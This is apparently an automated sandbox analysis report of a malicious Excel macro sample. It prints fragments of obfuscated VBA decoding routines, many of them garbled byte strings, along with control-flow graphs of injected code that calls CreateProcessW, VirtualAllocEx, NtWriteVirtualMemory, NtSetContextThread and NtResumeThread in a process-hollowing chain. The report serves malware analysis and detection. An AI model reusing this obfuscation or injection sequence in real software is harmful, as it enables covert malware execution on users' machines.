\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae, 1)

                                              Mid

                                              16

                                              \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab = \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab + \xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7

                                              17

                                              Else

                                              18

                                              \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab = \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab + Mid(\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6, u, 1)

                                              Mid

                                              19

                                              Endif

                                              20

                                              Next

                                              Len("\V\xfffdZVQX\xfffd\xfffdT.\xfffd\xfffd\xfffd") -> 14

                                              executed
                                              21

                                              \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd = \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab

                                              22

                                              End Function

                                              Function

                                              WfgxfcGreanxAPIs: 2, Strings: 0, Number of lines: 12, Relevance: 2.512

                                              APIsMeta Information

                                              Part of subcall function jumong@ThisWorkbook: Axgfhhdfthdsthdf

                                              Part of subcall function jumong@ThisWorkbook: Axgfhhdfthdsthdf

                                              LineInstructionMeta Information
                                              74

                                              Function WfgxfcGreanx() as Byte

                                              75

                                              WfgxfcGreanx = 100

                                              76

                                              Call xdfzfgxdb()

                                              77

                                              Function xdfzfgxdb() As Boolean ' BAD !

                                              78

                                              xdfzfgxdb = False

                                              79

                                              Call Doorroom()

                                              80

                                              Function Doorroom() As Double ' BAD !

                                              81

                                              Doorroom = Doorroom

                                              82

                                              Call yormmmom()

                                              83

                                              Function yormmmom() As Variant ' BAD !

                                              84

                                              yormmmom = jumong

                                              85

                                              End Function

                                              Function

                                              jumongAPIs: 2, Strings: 0, Number of lines: 8, Relevance: 2.508

                                              APIsMeta Information

                                              Axgfhhdfthdsthdf

                                              Axgfhhdfthdsthdf

                                              LineInstructionMeta Information
                                              24

                                              Function jumong() as Long

                                              26

                                              jumong = fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux

                                              27

                                              fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux As Byte ' BAD !

                                              28

                                              fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux = 102

                                              29

                                              Call Axgfhhdfthdsthdf()

                                              Axgfhhdfthdsthdf

                                              30

                                              Function Axgfhhdfthdsthdf() ' BAD !

                                              31

                                              Axgfhhdfthdsthdf

                                              Axgfhhdfthdsthdf

                                              32

                                              End Function

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:33%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:75.2%
                                                Total number of Nodes:133
                                                Total number of Limit Nodes:0
                                                execution_graph 2737 1a57a0 2739 1a5830 CreateProcessW 2737->2739 2740 1a5c04 2739->2740 2741 1a3dc0 2742 1a3ddc 2741->2742 2747 1a4a69 2742->2747 2743 1a3e90 2788 1a6850 2743->2788 2748 1a4c7c 2747->2748 2829 1a5d80 2748->2829 2834 1a5d71 2748->2834 2749 1a4e33 2784 1a5d80 2 API calls 2749->2784 2785 1a5d71 2 API calls 2749->2785 2750 1a4e77 2839 1a6388 2750->2839 2843 1a6381 2750->2843 2751 1a4efd 2762 1a5d80 2 API calls 2751->2762 2763 1a5d71 2 API calls 2751->2763 2752 1a4f89 2847 1a6481 2752->2847 2851 1a6488 2752->2851 2753 1a4fc7 2770 1a5d80 2 API calls 2753->2770 2771 1a5d71 2 API calls 2753->2771 2754 1a50f0 2855 1a65a8 2754->2855 2859 1a65a0 2754->2859 2755 1a512c 2782 1a5d80 2 API calls 2755->2782 2783 1a5d71 2 API calls 2755->2783 2756 1a518b 2757 1a54b4 2756->2757 2776 1a65a8 NtWriteVirtualMemory 2756->2776 2777 1a65a0 NtWriteVirtualMemory 2756->2777 2772 1a65a8 NtWriteVirtualMemory 2757->2772 2773 1a65a0 NtWriteVirtualMemory 2757->2773 2758 1a55bd 2780 1a5d80 2 API calls 2758->2780 2781 1a5d71 2 API calls 2758->2781 2759 1a560b 2863 1a66f9 2759->2863 2867 1a6700 2759->2867 2760 1a56b3 2768 1a6388 NtResumeThread 2760->2768 2769 1a6381 NtResumeThread 2760->2769 2761 1a5730 2761->2743 2762->2752 2763->2752 2768->2761 2769->2761 2770->2754 2771->2754 2772->2758 2773->2758 2776->2756 2777->2756 2780->2759 2781->2759 2782->2756 2783->2756 2784->2750 2785->2750 2789 1a6894 2788->2789 2879 1a73b8 2789->2879 2884 1a73a8 2789->2884 2790 1a6a4b 2825 1a73b8 2 API calls 2790->2825 2826 1a73a8 2 API calls 2790->2826 2791 1a6a8f 2827 1a6388 NtResumeThread 2791->2827 2828 1a6381 NtResumeThread 2791->2828 2792 1a6b15 2803 1a73b8 2 API calls 2792->2803 2804 1a73a8 2 API calls 2792->2804 2793 1a6ba1 2805 1a6488 VirtualAllocEx 2793->2805 2806 1a6481 VirtualAllocEx 2793->2806 2794 1a6bdf 2813 1a73b8 2 API calls 2794->2813 2814 1a73a8 2 API calls 2794->2814 2795 1a6d08 2815 1a65a8 NtWriteVirtualMemory 2795->2815 2816 1a65a0 NtWriteVirtualMemory 2795->2816 2796 1a6d44 2821 1a73b8 2 API calls 2796->2821 2822 1a73a8 2 API calls 2796->2822 2797 1a70cc 2811 1a65a8 NtWriteVirtualMemory 2797->2811 2812 1a65a0 NtWriteVirtualMemory 2797->2812 2798 1a71d5 2823 1a73b8 2 API calls 2798->2823 2824 1a73a8 2 API calls 2798->2824 2799 1a7223 2807 1a66f9 NtSetContextThread 2799->2807 2808 1a6700 NtSetContextThread 2799->2808 2800 1a72cb 2809 1a6388 NtResumeThread 2800->2809 2810 1a6381 NtResumeThread 2800->2810 2801 1a3ef2 2802 1a6da3 2802->2797 2817 1a65a8 NtWriteVirtualMemory 2802->2817 2818 1a65a0 NtWriteVirtualMemory 2802->2818 2803->2793 2804->2793 2805->2794 2806->2794 2807->2800 2808->2800 2809->2801 2810->2801 2811->2798 2812->2798 2813->2795 2814->2795 2815->2796 2816->2796 2817->2802 2818->2802 2821->2802 2822->2802 2823->2799 2824->2799 2825->2791 2826->2791 2827->2792 2828->2792 2830 1a5da4 2829->2830 2871 1a6258 2830->2871 2875 1a6250 2830->2875 2831 1a5e59 2831->2749 2835 1a5d1a 2834->2835 2835->2834 2837 1a6258 NtReadVirtualMemory 2835->2837 2838 1a6250 NtReadVirtualMemory 2835->2838 2836 1a5e59 2836->2749 2837->2836 2838->2836 2840 1a63cc NtResumeThread 2839->2840 2842 1a6423 2840->2842 2842->2751 2844 1a6388 NtResumeThread 2843->2844 2846 1a6423 2844->2846 2846->2751 2848 1a64cc VirtualAllocEx 2847->2848 2850 1a6544 2848->2850 2850->2753 2852 1a64cc VirtualAllocEx 2851->2852 2854 1a6544 2852->2854 2854->2753 2856 1a65f1 NtWriteVirtualMemory 2855->2856 2858 1a668a 2856->2858 2858->2755 2860 1a65f1 NtWriteVirtualMemory 2859->2860 2862 1a668a 2860->2862 2862->2755 2864 1a6749 NtSetContextThread 2863->2864 2866 1a67c1 2864->2866 2866->2760 2868 1a6749 NtSetContextThread 2867->2868 2870 1a67c1 2868->2870 2870->2760 2872 1a62a4 NtReadVirtualMemory 2871->2872 2874 1a631c 2872->2874 2874->2831 2876 1a62a4 NtReadVirtualMemory 2875->2876 2878 1a631c 2876->2878 2878->2831 2880 1a73dc 2879->2880 2882 1a6258 NtReadVirtualMemory 2880->2882 2883 1a6250 NtReadVirtualMemory 2880->2883 2881 1a7491 2881->2790 2882->2881 2883->2881 2885 1a73b8 2884->2885 2887 1a6258 NtReadVirtualMemory 2885->2887 2888 1a6250 NtReadVirtualMemory 2885->2888 2886 1a7491 2886->2790 2887->2886 2888->2886 2893 1a3db0 2894 1a3ddc 2893->2894 2898 1a4a69 10 API calls 2894->2898 2895 1a3e90 2897 1a6850 10 API calls 2895->2897 2896 1a3ef2 2897->2896 2898->2895 2889 1a5794 2891 1a5830 CreateProcessW 2889->2891 2892 1a5c04 2891->2892

                                                Executed Functions

                                                Function 001A4A69 Relevance: 2.2, Strings: 1, Instructions: 906COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 1a4a69-1a4c7a 1 1a4c7c 0->1 2 1a4c81-1a4d9d 0->2 1->2 11 1a4d9f 2->11 12 1a4da4-1a4e15 call 1a48f4 2->12 11->12 17 1a4e1c-1a4e27 12->17 18 1a4e17 12->18 150 1a4e2d call 1a5d80 17->150 151 1a4e2d call 1a5d71 17->151 18->17 19 1a4e33-1a4e45 20 1a4e4c-1a4e59 19->20 21 1a4e47 19->21 22 1a4e5b 20->22 23 1a4e60-1a4e6b 20->23 21->20 22->23 156 1a4e71 call 1a5d80 23->156 157 1a4e71 call 1a5d71 23->157 24 1a4e77-1a4ebc 26 1a4ebe 24->26 27 1a4ec3-1a4ef8 24->27 26->27 158 1a4efb call 1a6388 27->158 159 1a4efb call 1a6381 27->159 29 1a4efd-1a4f3a 31 1a4f3c 29->31 32 1a4f41-1a4f6b 29->32 31->32 34 1a4f6d 32->34 35 1a4f72-1a4f7d 32->35 34->35 134 1a4f83 call 1a5d80 35->134 135 1a4f83 call 1a5d71 35->135 36 1a4f89-1a4fc2 136 1a4fc5 call 1a6488 36->136 137 1a4fc5 call 1a6481 36->137 38 1a4fc7-1a4fe0 39 1a4fe2 38->39 40 1a4fe7-1a5024 38->40 39->40 43 1a502b-1a5097 40->43 44 1a5026 40->44 48 1a5099 43->48 49 1a509e-1a50d2 43->49 44->43 48->49 50 1a50d9-1a50e4 49->50 51 1a50d4 49->51 142 1a50ea call 1a5d80 50->142 143 1a50ea call 1a5d71 50->143 51->50 52 1a50f0-1a510d 53 1a510f 52->53 54 1a5114-1a5127 52->54 53->54 146 1a512a call 1a65a8 54->146 147 1a512a call 1a65a0 54->147 55 1a512c-1a516d 57 1a516f 55->57 58 1a5174-1a517f 55->58 57->58 154 1a5185 call 1a5d80 58->154 155 1a5185 call 1a5d71 58->155 59 1a518b-1a51be 62 1a51c0 59->62 63 1a51c5-1a5216 59->63 62->63 65 1a521c-1a5267 63->65 66 1a54b4-1a54ea 63->66 78 1a5269 65->78 79 1a526e-1a5316 65->79 69 1a54ec 66->69 70 1a54f1-1a5522 66->70 69->70 73 1a5529-1a5548 70->73 74 1a5524 70->74 76 1a554a 73->76 77 1a554f-1a5565 73->77 74->73 76->77 80 1a556c-1a55b8 77->80 81 1a5567 77->81 78->79 89 1a5318 79->89 90 1a531d-1a5327 79->90 144 1a55bb call 1a65a8 80->144 145 1a55bb call 1a65a0 80->145 81->80 89->90 94 1a5329 90->94 95 1a532e-1a5335 90->95 91 1a55bd-1a55ed 92 1a55ef 91->92 93 1a55f4-1a55ff 91->93 92->93 152 1a5605 call 1a5d80 93->152 153 1a5605 call 1a5d71 93->153 94->95 96 1a533c-1a5362 95->96 97 1a5337 95->97 104 1a5369-1a53b5 96->104 105 1a5364 96->105 97->96 98 1a560b-1a561d 100 1a561f 98->100 101 1a5624-1a5629 98->101 100->101 102 1a562b 101->102 103 1a5630-1a5645 101->103 102->103 106 1a564c-1a568c 103->106 107 1a5647 103->107 113 1a53bc-1a53c5 104->113 114 1a53b7 104->114 105->104 110 1a568e 106->110 111 1a5693-1a56ae 106->111 107->106 110->111 138 1a56b1 call 1a66f9 111->138 139 1a56b1 call 1a6700 111->139 115 1a53cc-1a540f 113->115 116 1a53c7 113->116 114->113 124 1a5411 115->124 125 1a5416-1a5465 115->125 116->115 117 1a56b3-1a56f0 120 1a56f2 117->120 121 1a56f7-1a572b 117->121 120->121 140 1a572e call 1a6388 121->140 141 1a572e call 1a6381 121->141 124->125 129 1a546c-1a547f 125->129 130 1a5467 125->130 126 1a5730-1a5786 148 1a5482 call 1a65a8 129->148 149 1a5482 call 1a65a0 129->149 130->129 132 1a5484-1a54ae 132->65 132->66 134->36 135->36 136->38 137->38 138->117 139->117 140->126 141->126 142->52 143->52 144->91 145->91 146->55 147->55 148->132 149->132 150->19 151->19 152->98 153->98 154->59 155->59 156->24 157->24 158->29 159->29
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,
                                                • API String ID: 0-3772416878
                                                • Opcode ID: 824af86783286e1c63f160f6b3c874b79d1cca088360511876a2f353df08dc8e
                                                • Instruction ID: e5d9f9be4050981e18bda9091de1a364e90d9f1b1a90fdff7b16fb088603aa7d
                                                • Opcode Fuzzy Hash: 824af86783286e1c63f160f6b3c874b79d1cca088360511876a2f353df08dc8e
                                                • Instruction Fuzzy Hash: 0D628378A006289FDB64DF68CD85BDDBBB6AB89300F1480E9E40DA7351DB359E81CF50
                                                Function 001A6850 Relevance: 1.9, Strings: 1, Instructions: 675COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 160 1a6850-1a6892 161 1a6899-1a69b5 160->161 162 1a6894 160->162 171 1a69bc-1a6a2d call 1a4a3c 161->171 172 1a69b7 161->172 162->161 177 1a6a2f 171->177 178 1a6a34-1a6a3f 171->178 172->171 177->178 310 1a6a45 call 1a73b8 178->310 311 1a6a45 call 1a73a8 178->311 179 1a6a4b-1a6a5d 180 1a6a5f 179->180 181 1a6a64-1a6a71 179->181 180->181 182 1a6a78-1a6a83 181->182 183 1a6a73 181->183 316 1a6a89 call 1a73b8 182->316 317 1a6a89 call 1a73a8 182->317 183->182 184 1a6a8f-1a6ad4 186 1a6adb-1a6b10 184->186 187 1a6ad6 184->187 318 1a6b13 call 1a6388 186->318 319 1a6b13 call 1a6381 186->319 187->186 189 1a6b15-1a6b52 191 1a6b59-1a6b83 189->191 192 1a6b54 189->192 194 1a6b8a-1a6b95 191->194 195 1a6b85 191->195 192->191 294 1a6b9b call 1a73b8 194->294 295 1a6b9b call 1a73a8 194->295 195->194 196 1a6ba1-1a6bda 296 1a6bdd call 1a6488 196->296 297 1a6bdd call 1a6481 196->297 198 1a6bdf-1a6bf8 199 1a6bfa 198->199 200 1a6bff-1a6c3c 198->200 199->200 203 1a6c3e 200->203 204 1a6c43-1a6caf 200->204 203->204 208 1a6cb1 204->208 209 1a6cb6-1a6cea 204->209 208->209 210 1a6cec 209->210 211 1a6cf1-1a6cfc 209->211 210->211 304 1a6d02 call 1a73b8 211->304 305 1a6d02 call 1a73a8 211->305 212 1a6d08-1a6d25 213 1a6d2c-1a6d3f 212->213 214 1a6d27 212->214 306 1a6d42 call 1a65a8 213->306 307 1a6d42 call 1a65a0 213->307 214->213 215 1a6d44-1a6d85 217 1a6d8c-1a6d97 215->217 218 1a6d87 215->218 312 1a6d9d call 1a73b8 217->312 313 1a6d9d call 1a73a8 217->313 218->217 219 1a6da3-1a6dd6 222 1a6dd8 219->222 223 1a6ddd-1a6e2e 219->223 222->223 225 1a70cc-1a7102 223->225 226 1a6e34-1a6e7f 223->226 229 1a7109-1a713a 225->229 230 1a7104 225->230 236 1a6e81 226->236 237 1a6e86-1a6f2e 226->237 233 1a713c 229->233 234 1a7141-1a7160 229->234 230->229 233->234 238 1a7162 234->238 239 1a7167-1a717d 234->239 236->237 250 1a6f30 237->250 251 1a6f35-1a6f3f 237->251 238->239 240 1a717f 239->240 241 1a7184-1a71d0 239->241 240->241 302 1a71d3 call 1a65a8 241->302 303 1a71d3 call 1a65a0 241->303 249 1a71d5-1a7205 252 1a720c-1a7217 249->252 253 1a7207 249->253 250->251 254 1a6f41 251->254 255 1a6f46-1a6f4d 251->255 314 1a721d call 1a73b8 252->314 315 1a721d call 1a73a8 252->315 253->252 254->255 256 1a6f4f 255->256 257 1a6f54-1a6f7a 255->257 256->257 264 1a6f7c 257->264 265 1a6f81-1a6fcd 257->265 258 1a7223-1a7235 259 1a723c-1a7241 258->259 260 1a7237 258->260 262 1a7248-1a725d 259->262 263 1a7243 259->263 260->259 266 1a725f 262->266 267 1a7264-1a72a4 262->267 263->262 264->265 273 1a6fcf 265->273 274 1a6fd4-1a6fdd 265->274 266->267 270 1a72ab-1a72c6 267->270 271 1a72a6 267->271 298 1a72c9 call 1a66f9 270->298 299 1a72c9 call 1a6700 270->299 271->270 273->274 275 1a6fdf 274->275 276 1a6fe4-1a7027 274->276 275->276 284 1a7029 276->284 285 1a702e-1a707d 276->285 277 1a72cb-1a7308 280 1a730a 277->280 281 1a730f-1a7343 277->281 280->281 300 1a7346 call 1a6388 281->300 301 1a7346 call 1a6381 281->301 284->285 289 1a707f 285->289 290 1a7084-1a7097 285->290 286 1a7348-1a739e 289->290 308 1a709a call 1a65a8 290->308 309 1a709a call 1a65a0 290->309 292 1a709c-1a70c6 292->225 292->226 294->196 295->196 296->198 297->198 298->277 299->277 300->286 301->286 302->249 303->249 304->212 305->212 306->215 307->215 308->292 309->292 310->179 311->179 312->219 313->219 314->258 315->258 316->184 317->184 318->189 319->189
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,
                                                • API String ID: 0-3772416878
                                                • Opcode ID: 6ae933fe4e4d9f53cf0cc6a308ba7cc8a9c40bae5bd6ef2b8f061b52a8d7c0c2
                                                • Instruction ID: 199d64e62b90930aee748c2dbbe6c8adf6ecba14251f4f1956c4a5884c562d7f
                                                • Opcode Fuzzy Hash: 6ae933fe4e4d9f53cf0cc6a308ba7cc8a9c40bae5bd6ef2b8f061b52a8d7c0c2
                                                • Instruction Fuzzy Hash: 07628478A002289FDB64DF68CD85BDDB7B6AB89310F1480EAE50DA7351DB359E81CF50
                                                Function 001A57A0 Relevance: 1.9, APIs: 1, Instructions: 397processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 320 1a57a0-1a585a 322 1a5912-1a5927 320->322 323 1a5860-1a589b 320->323 324 1a592d-1a5973 322->324 325 1a59d7-1a59db 322->325 339 1a589d-1a58a5 323->339 340 1a58d3-1a58e4 323->340 343 1a59b1-1a59bc 324->343 344 1a5975-1a597d 324->344 327 1a59dd-1a5a1f 325->327 328 1a5a25-1a5a76 325->328 327->328 330 1a5b2e-1a5b40 328->330 331 1a5a7c-1a5ab7 328->331 332 1a5b5d-1a5b6f 330->332 333 1a5b42-1a5b5a 330->333 360 1a5ab9-1a5ac1 331->360 361 1a5aef-1a5b00 331->361 337 1a5b8c-1a5c02 CreateProcessW 332->337 338 1a5b71-1a5b89 332->338 333->332 345 1a5c0b-1a5c4c 337->345 346 1a5c04-1a5c0a 337->346 338->337 347 1a58c8-1a58d1 339->347 348 1a58a7-1a58b1 339->348 354 1a58ea-1a590a 340->354 362 1a59c2-1a59d1 343->362 349 1a597f-1a5989 344->349 350 1a59a0-1a59af 344->350 369 1a5c4e-1a5c5d 345->369 370 1a5c63-1a5c7a 345->370 346->345 347->354 351 1a58b3 348->351 352 1a58b5-1a58c4 348->352 357 1a598b 349->357 358 1a598d-1a599c 349->358 350->362 351->352 352->352 363 1a58c6 352->363 354->322 357->358 358->358 366 1a599e 358->366 367 1a5ac3-1a5acd 360->367 368 1a5ae4-1a5aed 360->368 374 1a5b06-1a5b26 361->374 362->325 363->347 366->350 372 1a5acf 367->372 373 1a5ad1-1a5ae0 367->373 368->374 369->370 378 1a5c7c-1a5c88 370->378 379 1a5c93-1a5ca3 370->379 372->373 373->373 376 1a5ae2 373->376 374->330 376->368 378->379 380 1a5cba-1a5cfd 379->380 381 1a5ca5-1a5cb4 379->381 386 1a5cff-1a5d03 380->386 387 1a5d0d-1a5d11 380->387 381->380 386->387 390 1a5d05-1a5d08 call 1a0420 386->390 388 1a5d13-1a5d17 387->388 389 1a5d21-1a5d25 387->389 388->389 392 1a5d19-1a5d1c call 1a0420 388->392 393 1a5d27-1a5d2b 389->393 394 1a5d35 389->394 390->387 392->389 393->394 396 1a5d2d-1a5d30 call 1a0420 393->396 398 1a5d36 394->398 396->394 398->398
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001A5BEF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 3b0045e58dba7d60d69c8786f04df03ea15eeb99326f66ead003184696f5f7f9
                                                • Instruction ID: 04db22748045b10274e8a8511adb4456ee2e4074f7510c5e4f3628425c26a0ce
                                                • Opcode Fuzzy Hash: 3b0045e58dba7d60d69c8786f04df03ea15eeb99326f66ead003184696f5f7f9
                                                • Instruction Fuzzy Hash: 4402C374E04628CFEB24CFA9C885B9DBBB2BF49304F1081A9E419B7251D734AE85CF55
                                                Function 001A5794 Relevance: 1.9, APIs: 1, Instructions: 391processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 399 1a5794-1a585a 401 1a5912-1a5927 399->401 402 1a5860-1a589b 399->402 403 1a592d-1a5973 401->403 404 1a59d7-1a59db 401->404 418 1a589d-1a58a5 402->418 419 1a58d3-1a58e4 402->419 422 1a59b1-1a59bc 403->422 423 1a5975-1a597d 403->423 406 1a59dd-1a5a1f 404->406 407 1a5a25-1a5a76 404->407 406->407 409 1a5b2e-1a5b40 407->409 410 1a5a7c-1a5ab7 407->410 411 1a5b5d-1a5b6f 409->411 412 1a5b42-1a5b5a 409->412 439 1a5ab9-1a5ac1 410->439 440 1a5aef-1a5b00 410->440 416 1a5b8c-1a5c02 CreateProcessW 411->416 417 1a5b71-1a5b89 411->417 412->411 424 1a5c0b-1a5c4c 416->424 425 1a5c04-1a5c0a 416->425 417->416 426 1a58c8-1a58d1 418->426 427 1a58a7-1a58b1 418->427 433 1a58ea-1a590a 419->433 441 1a59c2-1a59d1 422->441 428 1a597f-1a5989 423->428 429 1a59a0-1a59af 423->429 448 1a5c4e-1a5c5d 424->448 449 1a5c63-1a5c7a 424->449 425->424 426->433 430 1a58b3 427->430 431 1a58b5-1a58c4 427->431 436 1a598b 428->436 437 1a598d-1a599c 428->437 429->441 430->431 431->431 442 1a58c6 431->442 433->401 436->437 437->437 445 1a599e 437->445 446 1a5ac3-1a5acd 439->446 447 1a5ae4-1a5aed 439->447 453 1a5b06-1a5b26 440->453 441->404 442->426 445->429 451 1a5acf 446->451 452 1a5ad1-1a5ae0 446->452 447->453 448->449 457 1a5c7c-1a5c88 449->457 458 1a5c93-1a5ca3 449->458 451->452 452->452 455 1a5ae2 452->455 453->409 455->447 457->458 459 1a5cba-1a5cfd 458->459 460 1a5ca5-1a5cb4 458->460 465 1a5cff-1a5d03 459->465 466 1a5d0d-1a5d11 459->466 460->459 465->466 469 1a5d05-1a5d08 call 1a0420 465->469 467 1a5d13-1a5d17 466->467 468 1a5d21-1a5d25 466->468 467->468 471 1a5d19-1a5d1c call 1a0420 467->471 472 1a5d27-1a5d2b 468->472 473 1a5d35 468->473 469->466 471->468 472->473 475 1a5d2d-1a5d30 call 1a0420 472->475 477 1a5d36 473->477 475->473 477->477
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001A5BEF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
